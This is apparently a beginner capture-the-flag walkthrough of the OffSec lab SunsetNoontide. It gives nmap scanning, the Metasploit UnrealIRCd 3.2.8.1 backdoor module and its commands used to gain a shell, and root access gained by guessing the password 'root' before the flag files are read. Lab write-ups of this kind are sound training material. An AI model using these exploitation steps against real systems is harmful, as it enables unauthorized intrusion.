SunsetNoontide OffSec Walkthrough

1 Min Read

SunsetNoontide OffSec Walkthrough: SunsetNoontide is OffSec Proving Play Ground Lab which is for the beginner level. In this machine, our target is to find the flags and access the root. So, let’s get started.

Network Scanning

nmap -p- -A -sV 192.168.1.4

nmap scan

After checking for a backdoor exploit for UnrealIRCD in google, I found one.

Enumeration

Now using msfconsole, we will create backdoor.

msfconsole

metasploit framework

use exploit/unix/irc/unreal_ircd_3281_backdoor

show options

set RHOSTS 192.168.1.4

metasploit options

show payloads

set payload 1

metasploit payloads

Exploitation 

exploit

exploit

After this I gained access to the the machine.

In home directory there is a folder called server and in that folder is the user flag.

id

whoami

ls -la /home

ls -la /home/server

cat /home/server/local.txt

user flag

Privilege Escalation

Next step isto escalate the privilege. While trying to do so I guessed the password for root as root and got the access. And in the root directory there was the root flag.

su root

root (it is the password)

id

ls -la /root

cat /root/proof.txt

root flag

And we got the the flag!

It was very easy machine. Hope you find this walkthrough useful.

Thanks for reading.

Also Read | DogCat TryHackMe Walkthrough

Share This Article